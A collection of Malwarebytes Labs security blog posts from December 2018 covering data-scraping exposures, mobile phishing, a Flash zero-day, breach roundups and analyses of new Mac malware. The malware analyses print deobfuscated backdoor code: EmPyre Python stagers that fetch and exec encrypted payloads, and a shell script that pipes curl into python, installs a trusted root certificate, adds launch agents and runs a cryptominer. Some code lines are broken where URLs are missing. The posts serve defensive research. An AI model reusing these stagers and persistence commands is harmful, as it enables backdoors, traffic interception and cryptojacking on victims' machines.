Data scraping treasure trove found in the wild

Malwarebytes - Tue, 12/11/2018 - 16:56

We bring word of yet more data exposure, in the form of “nonsensitive” data scraping to the tune of 66m records across 3 large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

The gathering of information from websites either by manual means, which isn’t time optimal, or by automated processes such as dedicated programs or bots. Often, this data scraping is for nefarious purposes and can be used for marketing or simply threatening behaviour. It also typically relies on the person being scraped to have provided much of the grabbable data upfront. It’s frowned upon, but it’s often unclear where things stand legally.

Scrape all the things

Three large databases were found by security researchers, containing a combined tally of 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric, with one (for example) containing full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public facing Linkedin profile. Indeed, many people have said they received breach notifications to their Linkedin specific mail, and there’s some mention of Github too.

Elsewhere, some 22 million records were found on the second server. This related to job search aggregation data, and this included IP, name, email, and potential job locations. Number 3 sang to the tune of 48 million records, and also sounds like a generic business-centric dump. Name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, that may not apply to anybody finding the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online in terms of the Linkedin profile information, it’s all about personal choice. Take a look at your Linkedin right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location, does it have to be so precise? Or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead in!

A common destination for business-centric grab bags such as this one are unremarkable job search sites. Be on the look out for a flood of poor quality job offer spam. Be especially wary if they come bearing gifts of paid membership, as nobody should pay someone grabbing your data free of charge then using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be harvested, readjust quality filters if needed. The good news is, most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phonecalls and peculiar emails will go a long way towards minimising any further potential harm.

The post Data scraping treasure trove found in the wild appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Flurry of new Mac malware drops in December

Malwarebytes - Tue, 12/11/2018 - 16:00

Last week, we wrote about a new piece of malware called DarthMiner. It turns out there was more to be seen, as not just one but two additional pieces of malware had been spotted. The first was identified by Microsoft’s John Lambert and analyzed by Objective-See’s Patrick Wardle, and the second was found by Malwarebytes’ Adam Thomas.

A Word document with a malicious macro

Lambert identified a malicious Microsoft Word document containing a malicious Visual Basic macro in a Tweet that provided a VirusTotal link to the file. Wardle analyzed the document, which was named BitcoinMagazine-Quidax_InterviewQuestions_2018.docm, and the payload that it dropped.

Ordinarily, macros in Microsoft Office documents are sandboxed, meaning that they shouldn’t have any ability to make changes to the file system. However, in this case, the document uses a sandbox escape to create a launch agent on the system. This launch agent provides persistence to a Python script that sets up a Meterpreter backdoor.

Interestingly, this malware is a copy-and-paste job from a proof-of-concept published by Adam Chester back in February, even down to recycling the identifiers referring to Chester’s blog site, except that Chester hypothesized using EmPyre instead of Meterpreter as the backdoor.

Of course, the attack relies on the user opening a malicious Word document and allowing the macros to run, so social engineering is the main snare. As long as you never, ever allow macros to run in Microsoft Office documents, you’re safe from this kind of malware.

A malicious Discord imitator

On Friday, Adam Thomas found a malicious copy of Discord, an app for gamers to communicate with other gamers. However, this copy of Discord didn’t seem to do anything, because it was actually an Automator script that did nothing for the user.

The script, shown in edited form above to fit in a screenshot, decodes and executes a Python payload, then begins repeatedly taking screenshots and uploading them to a command-and-control (C&C) server.

The decoded payload included quite a bit of Python code, including two additional snippets of base64-encoded Python. One of these bits of code set up an EmPyre backdoor:

qPnQAZwbqBZ='PBlqIV' import sys, urllib2;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) out = ps.stdout.close() if"Little Snitch", out): sys.exit() o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();UA='Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0';o.addheaders=[('User-Agent',UA)];'').read();key='7b3639a4ab39765739a5e0ed75bc8016';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in a: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))

The script also sets up a launch agent named, which persistently keeps both the screenshot code and the EmPyre backdoor code running.

This malware is really unconvincing, as it does nothing at all to pretend that it is a legit Discord app. It is not a maliciously-modified copy of the Discord app. It doesn’t even include and launch a copy of the Discord app, which it could do easily as a subterfuge to make the app look legit. For that matter, it doesn’t even use a convincing icon!

Instead, the malware uses a generic Automator applet icon, and all that happens when running is that a gear icon appears in the menu bar (as is normal for any Automator script).

Of course, by the time the user notices something is wrong, the malware has set up the launch agent, opened the backdoor, and sent off some screenshots. Many users may notice something is off, but they may not know what to do about it.

Interesting similarities

There are some interesting similarities between this fake Discord malware, which Malwarebytes detects as OSX.LamePyre, and the OSX.DarthMiner malware discovered earlier this week. Both are distributed in the form of Automator applets, both applets run Python scripts, and both use an EmPyre backdoor.

However, there are some differences as well. The means for running the Python script is different in these two cases. Further, the apparent primary purpose for the malware is also different: cryptomining, in the case of DarthMiner, and screen captures, in the case of LamePyre.

It seems likely that these could be made by the same person, but it’s also possible that one is a copycat of the other.

The Word macro malware (which Malwarebytes currently detects as OSX.BadWord, for lack of an official name) similarly sets up a backdoor using Python, and like OSX.DarthMiner, it executes the Python code directly in the launch agent, which is somewhat unusual. Of course, it uses a different backdoor and a different delivery method.

All three have made heavy use of borrowed code in the form of open-source backdoors (EmPyre in two cases, Metasploit’s Meterpreter module in the third) as well as copy-paste of VBA exploit code directly from a researcher’s blog.

Two malware, one maker?

The similarities between all these pieces of malware, as well as the close coincidence in timing (all were first submitted to VirusTotal within about a one month period), may mean that they were all be made by the same malware developer.

However, there is no concrete evidence for that supposition at this time. The IP addresses these pieces of malware communicate with are scattered around the globe in the US, Luxembourg, Germany, and the Netherlands, and there are no obvious connections between them. The code is similar, but not identical.

At this time, we are calling each of these by a different name, but will keep investigating.

In the meantime, the best things you can do to stay safe are:

  • Don’t allow macros to run in Microsoft Office documents
  • Don’t download software from anywhere other than the developer’s official site, and especially not piracy sites
  • Don’t open anything sent to you via email unless you know the sender and were expecting it
  • If you open a newly-downloaded application and something doesn’t work as expected, check with the developer
IOCs BitcoinMagazine-Quidax_InterviewQuestions_2018.docm: 4454e768b295ed2869f657b2e9f47421b6ca0548e67092735665cd339a41dddb a899a7d33d9ba80b6f9500585fa108178753894dfd249c2ba64c9d6a601c516b

The post Flurry of new Mac malware drops in December appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 3 – 9)

Malwarebytes - Mon, 12/10/2018 - 17:32

Last week on Malwarebytes Labs, we gave readers an FYI on multiple breaches that affected Humble Bundle, Quora, and Dunkin’ Donuts, to name a few. This follows the announcement from Marriott about a four-year-long breach that impacted half a billion of its patrons.

We also pushed out the report, “Under the Radar: The Future of Undetected Malware”, wherein we examined current threats and the technologies that are unprepared for them. You can download the report directly here.

Lastly, we discovered a new Mac malware, which has the combined the capabilities of the Empyre backdoor and the XMRig miner, and reported about a new Adobe Flash zero-day vulnerability that was used against a Russian facility in a targeted attack campaign.

Other cybersecurity news:

Stay safe!

The post A week in security (December 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Something else is phishy: How to detect phishing attempts on mobile

Malwarebytes - Mon, 12/10/2018 - 15:00

In a report published in 2011, IBM revealed that mobile users are three times more likely to fall for phishing scams compared to desktop users. This claim was based on accessed log files found on Web servers used to host websites involved in phishing campaigns.

Almost a decade later, we continue to see different organizations reporting an increased trend in phishing attacks targeting the mobile market. Surprisingly, phishers seem to have tipped the scales to a new preferred target: iPhone users. Wandera, a mobile security solutions provider, has observed that iOS users experience twice as many phishing attacks compared to their Android counterparts.

Mobile phishing by the numbers

Below is a quick rundown of current noteworthy mobile phishing statistics to date:

  • In the whitepaper “Mobile phishing 2018: Myths and facts facing every modern enterprise today” (PDF), Lookout has determined that the rate at which users are tapping phishing links has grown an average of 85% since 2011.
  • In the latest “Phishing Activity Trend Report” (PDF), the Anti-Phishing Working Group (APWG) has revealed that the Payments industry continues to rank as the top targeted sector by phishing threat actors (36%) in Q1 2018.
  • This same APWG report also claims that 35% of all phishing sites were using HTTPS and SSL certificates.

    With Google now labeling non-HTTPS website as “Non-Secure,” expect to see more phishers abuse the accepted concept that HTTPS sites are trustworthy and legitimate.

  • In their report, “2018 State of Phish”, Wombat Security hailed smishing, short for SMS phishing, as the attack vector to watch. This is due to its increased media reporting in 2017, which they believe will continue to trend, especially in countries with low awareness of mobile phishing.
  • PhishLabs stated in its “2018 Phishing Trends & Intelligence Report” (PDF) that Email/Online Services is the top targeted industry in the second half of 2017 (26.1%), with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages. This suggests that there is an increasing trend of phishing campaigns targeting businesses.
  • This same PhishLabs report has also noted a dramatic increase of phishing campaigns banking on the trust of users towards software-as-a-service (SaaS) companies (7.1%). Such attacks are said to be non-existent before 2015 but have more than doubled in two succeeding years.
  • Wandera stated that 48% of phishing attacks happen on mobile. They also claim that iOS users are 18X more likely to fall for a phish than to download malware.
Mobile phishing scam types

Phishing attacks are no longer exclusive to emails, especially on mobile. A mobile device’s inherent design and features have made it possible for phishers to create ways on how they can get into users’ heads and get their hands on vital personal and business data.

While many users are quite familiar with what phishing looks like on the desktop, these same users are not as familiar with smishing or vishing—and other types of phish one might encounter on the mobile—as they are with email phishing.


SMiShing is phishing done through SMS. Android expert and Senior Analyst Nathan Collier has written about a smishing message a colleague received on their Android device that purportedly originating from a human resources company, promoting an open albeit fake position of Prime Agent for Amazon.

iOS users also have their share of spotted smishing campaigns. Below is a smishing message posted publicly on Reddit as a warning to other iPhone users:

Screenshot of an iOS SMS phishing message. Courtesy of Redditor u/jamesmt87.

Your Apple ID has been disabled until we hear from you ,
Prevent this by confirming your informations at { URL}
Apple inc


Vishing, or voice-mail phishing (at times, it also stands for VoIP phishing), is phishing done with the use of a device’s call feature. An attempt can be considered vishing if the potential phisher (1) leaves a recorded message to the target that something is wrong, (2) leaves a number that the target can use to call back, or (3) cold calls the target. Point two is precisely the tactic used by an iOS phishing scam that Ars Technica Editor Sean Gallagher revealed in a July 2018 post. According to Gallagher, an email directs users to a fake Apple website, which pops up a dialog box to start a call to a purported agent that goes by “Lance Roger at AppleCare.” AppleCare is Apple’s extended warranty service.

A vishing pop-up dialog box. Courtesy of Ars Technica.

In Android’s corner, we have the latest variant of Fakebank, a mobile Trojan that is capable of intercepting bank SMS and inbound and outgoing calls. A user, for example, making a call to a legitimate bank gets redirected to scammers who are posing as agents working for the bank. Security researchers have spotted this variant in affected apps geared towards Korean bank clients.

Vishing can also be a part of a greater business email compromise (BEC) attack.

Other types: messenger phishing, social phishing, and ad-network phishing

Apps continue to shape a user’s mobile experience for the better. Without them, one may likely just consider their phones as a pricey paperweight.

These brilliant little programs have made it possible for users to both access their personal and work emails while away from a desktop computer, keep in touch with family and friends via messaging platforms while on the go, share and access media in real-time, and stave off boredom while waiting.

Phishers, unfortunately, have leveraged the power of apps to their advantage. And the internet is rife with stories of people who got (or nearly got) phished via mobile apps.

Take, for instance, the Facebook message that used Messenger as a launchpad to spread a purported “viral video” of the recipient complete with their picture and name, and a number indicating the view count.

Screenshot of a Facebook Messenger phish. Courtesy of Security For Real People.

Clicking this “video” sent mobile users to a fake Facebook Videos login screen, wherein they were then encouraged to key in their Facebook credentials. Doing so sent a similar video bait to contacts, not to mention scammers hijacking the accounts of those who fell for this trick.

This is a case of messenger phishing. It is a type of phishing attempt that uses messaging services on mobile devices. Examples of these services are WhatsApp, Instagram, Viber, Skype, Snapchat, and Slack.

Then there’s social phishing, which is an attempt that abuses social networking sites to spread a phishing campaign. Below is a capture of a phishing message sent to a recipient via LinkedIn’s InMail feature:

Screenshot of a LinkedIn InMail phish. Courtesy of KnowBe4.

Here’s another case of social phishing: A Twitter account posing as NatWest bank inserted itself into a live conversation between a NatWest bank client and NatWest’s official Twitter channel in an attempt to present a bogus quick fix to the current concern the real bank was attempting to address.

Malwarebytes has caught a fake NatWest Twitter account red-handed.

Finally, ad-network phishing. On mobile, ads can come in many forms: They can be in free apps, on web pages the user visits, and as a pop-up notification or banner. Because apps communicate with other services (like an ad network) at the background, they can potentially expose mobile users to risks like a phishing campaign (at best) or malware (at worst).

We’d be remiss if we don’t mention phishing apps. These are fake apps that bank on the names of popular online brands, usually promising one or more perks if downloaded and installed. Such is the case of multiple fake Instagram apps that were pulled from the Google Play store after being found to collect credentials. These apps have been downloaded 1.5 million times, and they promise to boost follower count, post likes, and comments.

Mobile phish spotting

Mobile phishing attempts are quite a challenge to detect, more so for the uninitiated and the unacquainted. Regardless of your level of know-how or your computing platform of choice, as a rule of thumb, it is always best to familiarize yourself with common phishing tactics and trends. We already have a great and very comprehensive list of red flags that can guide you in determining phishing attempts in general. However, mobile users can significantly benefit from our listing of tell-tale signs of potential mobile phishing attempts (below) just as well:

  • The message comes out of the blue, claiming that you either (1) won a prize, (2) have an account or subscribed service suddenly deactivated (often without disclosing a reason), or (3) there is a very urgent need for you to do something to address a problem. Such claims are tried-and-tested social engineering ploys that more often than not give the game away.

    When it comes to being truly notified for actual breaches and that steps must be taken to mitigate its effects, however, it is best for users to avoid clicking links in these notifications (which we agree is faster and more convenient) in favor of going directly to the legitimate domain (either by loading it from bookmark or manually typing in the address in the address bar) and logging in from there.

  • The message comes from an unknown number or sender. And if it claims to be from a service you actually use, be doubly cautious. As it’s near impossible to determine on mobile if the service provider is who they say they really are, you might be better off verifying any claims for yourself, just like in the above point, and checking for logged suspicious activities. If you’re still a bit bothered, contact your service provider’s customer support department.
  • The message comes with a bogus hyperlink, which may be obvious to some but not to others. It pays to be very familiar with URLs of official web addresses of services you use online. If you feel or think that something is off, even if you’re unsure what is triggering this, err on the side of caution and avoid clicking that link.
  • The message comes with a shortened URL. Shortening URLs is an excellent method to make effective use of space that has a limited character count. Unfortunately, this can be abused to mask potentially malicious URLs from being detected at first glance.
  • If the message or caller asks for personal information, if not more information, from you. A majority of legitimate and reputable businesses don’t call or send messages asking for sensitive information. In some cases, banks do call if they suspect potential fraud activity with your account. They do this to check that you are who you say you are. However, there are certain information they will never ask you to divulge, such as your account PIN or Social Security Number (SSN).
  • If the message or caller doesn’t address you by your name. Again, a majority of businesses know who their clients are and will always address you by your name.
  • If the URL you get directed to doesn’t have a green padlock. Yes, having HTTPS on a website is no longer a solid proof that one is not on a malicious page, but there are still a lot of phishing campaigns out there that forgo using HTTPS.
  • If the URL you get redirected to appears to be right, but also has unexplained dashes after it. Phishers are already using a technique called URL padding, wherein they pad the subdomain, which consists of a legitimate website address, with hyphens to hide the real domain and create believability.

    Screenshot of a fake Facebook login screen where phishers used URL padding. Courtesy of PhishLabs.

    In this example, the complete URL is hxxp://[dot]com/sign_in.html, where rickytaylk[dot]com is the domain and is the long subdomain. Users would likely find it difficult to view the complete URL given the mobile’s small screen size, but what they can do is copy the URL and paste it on a notepad app. From there, users can scrutinize the URL more effectively.

A word on homograph attacks: Yes, they work on mobile devices, too. Fortunately, many of modern internet browsers are already programmed to display the Punycode version of domains that contain confusables (or non-English characters that visually appear similar to one or more English alphabets).

Users seeing a Punycode URL on their mobile browser could be alerted that they’re on a page they’re not supposed to be on. And this is a good thing. However, not all apps that accept and display text have considered the possibility of homograph attacks. According to Wandera’s research, many communications and collaboration tools used by employees on both Android and iOS don’t flag Punycode URLs as suspicious.

“Only Facebook Messenger, Instagram and Skype provided an opportunity for the user to identify the punycode URL by either showing a preview of the webpage with the xn prefix, or, in the case of skype, by not providing a hyperlink for domains using unicode, meaning users can’t click through from the message.” writes Liarna La Porta, Content Marketing Manager for Wandera, in a blog post. “While these apps are not providing the best methods of defense, they at least provide an opportunity to asses suspicious links more closely.”

Phish-proof no more?

In April of 2017, a Lithuanian man who posed as Quanta Computer, a Taiwanese electronics manufacturing company, successfully conned two big names in the tech industry, each paying him over $100M. These companies eventually got the bulk of their money back, but not after making headlines that made readers gasp. Who were these phishing victims? They’re Google and Facebook.

When it comes to a target’s low potentiality to fall for a phishing lure, it appears that tech savviness is slowly becoming a non-factor. It is challenging enough for desktop users to successfully determine a believable phish. With mobile devices, which already have a size limitation and more potential attack points, users are doubly challenged, especially if the adversary is motivated enough to steal the sensitive corporate data stored in them.

Indeed, phishing has branched beyond email. And using commodity-level phishing protection on mobile is inadequate in defending users from attacks. Being truly phish-proof (or akin to it) may require necessary adjustments on the side of both man and machine: improved security features on mobile devices and their apps, and knowing the red flags and what steps to take to adequately respond to a phishing attempt are key.

Recommended reading:

  • “Phishing attacks on modern Android” (direct PDF link here)
  • “Social Phishing” (direct PDF link here)


The post Something else is phishy: How to detect phishing attempts on mobile appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac malware combines EmPyre backdoor and XMRig miner

Malwarebytes - Fri, 12/07/2018 - 16:57

Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.

As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon.


Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

curl | python - & s=; curl $s/ -o; unzip -d sample; cd sample; cd __MACOSX; open -a

This script is designed to download and execute a Python script, then download and run an app named

The is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script:

import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) out = ps.stdout.close() if"Little Snitch", out): sys.exit() import urllib2; UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='';t='/news.php';req=urllib2.Request(server+t); req.add_header('User-Agent',UA); req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk="); proxy = urllib2.ProxyHandler(); o = urllib2.build_opener(proxy); urllib2.install_opener(o); a=urllib2.urlopen(req).read(); IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in data: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))

The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor’s network connection to the attention of the user. If Little Snitch is present, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would have already blocked the connection that would have attempted to download this script, so checking at this point is worthless.)

This script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the infected Mac. Once the backdoor is open, it receives a command that downloads the following script to /private/tmp/ and executes it:

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 8080 && networksetup -setwebproxy "Wi-Fi" 8080 && curl -x -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges" cd ~/Library/LaunchAgents curl -o curl -o com.proxy.initialize.plist launchctl load -w launchctl load -w com.proxy.initialize.plist cd /Users/Shared curl -o config.json curl -o xmrig chmod +x ./xmrig rm -rf ./xmrig2 rm -rf ./config2.json ./xmrig -c config.json &

This script downloads and installs the other components of the malware. A launch agent named com.proxy.initialize.plist was created to keep the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a launch agent named to keep the XMRig process running with that configuration active. (The “” name is an immediate red flag that was the root cause of the discovery of this malware.)

Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.

On the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to slow down, thanks to a process that sucks up all the CPU/GPU.

However, this is not just a cryptominer. It’s important to keep in mind that the cryptominer was installed through a command issued by the backdoor, and there may very well have been other arbitrary commands sent to infected Macs by the backdoor in the past. It’s impossible to know exactly what damage this malware might have done to infected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other things.


Malwarebytes for Mac detects this malware as OSX.DarthMiner. If you’re infected, it’s impossible to say what else the malware may have done besides cryptomining. It’s entirely possible it could have exfiltrated files or captured passwords.

There’s an important lesson to learn from this. Software piracy is known to be one of the riskiest activities you can undertake on your Mac. The danger of infection is high, and this is not new, yet people still engage in this behavior. Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free.

IOCs Adobe SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

The post Mac malware combines EmPyre backdoor and XMRig miner appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Flash Player zero-day used against Russian facility

Malwarebytes - Wed, 12/05/2018 - 22:44

For the past couple of years, Office documents have largely replaced exploit kits as the primary malware delivery vector, giving threat actors the choice between social engineering lures and exploits or a combination of both.

While today’s malicious spam (malspam) heavily relies on macros and popular vulnerabilities (i.e. CVE-2017-11882), attackers can also resort to zero-days when trying to compromise a target of interest.

In separate blog posts, Gigamon and 360 Core Security reveal how a new zero-day (CVE-2018-15982) for the Flash Player (version and earlier) was recently used in targeted attacks. Despite being a brand new vulnerability, Malwarebytes users were already protected against it thanks to our Anti-Exploit technology.

The Flash object is embedded into an Office document disguised as a questionnaire from a Moscow-based clinic.

A dot reveals an embedded (and hidden) ActiveX object

Since Flash usage in web browsers has been declining over the past few years, the preferred scenario is one where a Flash ActiveX control is embedded in an Office file. This is something we saw earlier this year with CVE-2018-4878 against South Korea.

360 Core Security identified the zero-day as a Use After Free vulnerability in a Flash package called com.adobe.tvsdk.mediacore.metadata.

ActionScript view of the malicious SWF exploit. Thanks David Ledbetter for sharing the dumped file.

Victims open the booby-trapped document from a WinRAR archive that also contains a bogus jpeg file (shellcode) that will be used as part of the exploitation process that eventually loads a backdoor.

Exploitation flow showing the processes involved in the attack

As Qihoo 360 security researchers noted, the timing with this zero-day attack is close to a recent real-world incident between Russia and Ukraine. Cyberattacks between the two countries have been going on for years and have affected major infrastructure, such as the power grid

Malwarebytes users were already protected against this zero-day without the need to update any signatures. We detect the malware payload as Trojan.CrisisHT.APT.

Zero-day attack flow stopped by Malwarebytes

Adobe has patched this vulnerability (security bulletin APSB18-42) and it is highly recommended to apply this patch if you are still using Flash Player. Following the typical exploit-patch cycle, zero-days often become mainstream once other attackers get their hands on the code. For this reason, we can expect to see this exploit integrated into document exploit kits as well as web exploit kits in the near future.

The post New Flash Player zero-day used against Russian facility appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Breaches, breaches everywhere, it must be the season

Malwarebytes - Wed, 12/05/2018 - 19:57

After last weeks shocker from Marriott this week started off with disclosures about breaches at Quora, Dunkin’ Donuts, and 1-800-Flowers.


Quora is an online community that focuses on asking and answering questions. It was founded in 2009 by two former Facebook employees.

The stolen data may concern up to 100 million users of the platform and included the username, the email address, and the encrypted password. In some cases, imported data from other social networks and private messages on the platform may have been taken as well.

To counter future abuse of the login credentials we would advise Quora users to change their password and make sure that the combination of credentials they used on Quora aren’t used elsewhere. Even though Quora used encryption and salted the passwords, it is not prudent to assume nobody will be able to decrypt them. For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

For those who no longer want to be registered at Quora, we also advise you to check under Settings and Disconnect any and all Connected Accounts.

Quora’s official statement can be checked for further details and updates.

Dunkin’ Donuts

A threat-actor successfully managed to gain access to Dunkin’ Donuts Perks accounts. The Perks accounts is a run-of-the-mill loyalty reward system. Dunkin’ Donuts claims that there was no breach into their systems but that re-used passwords were to blame.

we’ve been informed that third parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts.

As a countermeasure they forced password resets for all the customers the company believes were affected. If you are one of these customers the threat actors could have learned your first and last names, email addresses, 16-digit DD Perks account numbers, and DD Perks QR codes.

I repeat myself: For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.


The Canadian online outpost of the floral and gourmet foods gift retailer reported an incident where a threat-actor may have gained access to customer data from 75,000 Canadian orders, including names and credit card information, over a four-year period. Even though the breach did not impact any customers on its U.S. website,, the company has filed a notice with the attorney general’s office in California.

The stolen payment information seems to include credit card numbers and all the related information: names, expiration dates, and security codes. That’s really all any seasoned criminal needs to plunder your account.

Are you afraid to be a victim of this breach, here’s what you can do to prevent further damage:

  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering

Or download our Data Breach Checklist here.

Is it the season?

Some of the recent breaches happened quite some time ago or have been ongoing for years, so why are they all telling us now?

Possible reasons:

  • New legislation requires companies to report breaches
  • Breaches happen all the time, but these happen to be some very serious or big ones, so the media talks about them
  • When a big breach is aired you will always see a few smaller ones, trying to hide in their shadow
If you’re a business looking for tips to prevent getting hit by a breach:
  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Breaches, breaches everywhere, it must be the season appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New ‘Under the Radar’ report examines modern threats and future technologies

Malwarebytes - Wed, 12/05/2018 - 13:01

As if you haven’t heard it enough from us, the threat landscape is changing. It’s always changing, and usually not for the better.

The new malware we see being developed and deployed in the wild have features and techniques that allow them to go beyond what they were originally able to do, either for the purpose of additional infection or evasion of detection.

To that end, we decided to take a look at a few of these threats and pick apart what about them makes them difficult to detect, remaining just out of sight and able to silently spread across an organization.

 Download: Under the Radar: The Future of Undetected Malware

We then examine what technologies are unprepared for these threats, which modern tech is actually effective against these new threats, and finally, where the evolution of these threats might eventually lead.

The threats we discuss:

  • Emotet
  • TrickBot
  • Sorebrect
  • SamSam
  • PowerShell, as an attack vector

While discussing these threats, we also look at where they are most commonly found in the US, APAC, and EMEA regions.

Emotet 2018 detections in the United States

In doing so, we discovered interesting trends that create new questions, some of which are clear and others that need more digging. Regardless, it is evident that these threats are not old hat, but rather making bigger and bigger splashes as the year goes on, in interesting and sometimes unexpected ways.

Sorebrect ransomware detections in APAC region

Though the spread and capabilities of future threats are unknown, we have to prepare people to protect their data and experiences online. Unfortunately, many older security solutions will not be able to combat future threats, let alone what is out there now.

Not all is bad news in security, though, as we do have a lot going for us as in technological developments and innovations in modern features. For example:

  • Behavioral detection
  • Blocking at delivery
  • Self-defense modes

These features are effective at combating today’s threats and will soon be needed to build the basis for future developments, such as:

  • Artificial Intelligence being used to develop, distribute, or control malware
  • The continued development of fileless and “invisible” malware
  • Businesses becoming worm food for future malware
Download: Under the Radar: The Future of Undetected Malware

The post New ‘Under the Radar’ report examines modern threats and future technologies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Humble Bundle alerts customers to subscription reveal bug

Malwarebytes - Tue, 12/04/2018 - 17:20

You’ll want to check your mailbox if you have a Humble Bundle account, as they’re notifying some customers of a bug used to gather subscriber information.

Click to enlarge

The mail reads as follows:


Last week, we discovered someone using a bug in our code to access limited non-personal information about Humble Bundle accounts. The bug did not expose email addresses, but the person exploited it by testing a list of email addresses to see if they matched a Humble Bundle account. Your email address was one of the matches.

Now, this is the part of a breach/bug mail where you tend to say “Oh no, not again” and take a deep breath. Then you see how much of your personal information winged its way to the attacker.

Oh no, not again

For once, your name, address, and even your login details are apparently in safe hands. Either this bug didn’t expose as much as the attacker was hoping for, or they were just in it for the niche content collection.

The email continues:

Sensitive information such as your name, billing address, password, and payment information was NOT exposed. The only information they could have accessed is your Humble Monthly subscription status. More specifically, they might know if your subscription is active, inactive, or paused; when your plan expires; and if you’ve received any referral bonuses.

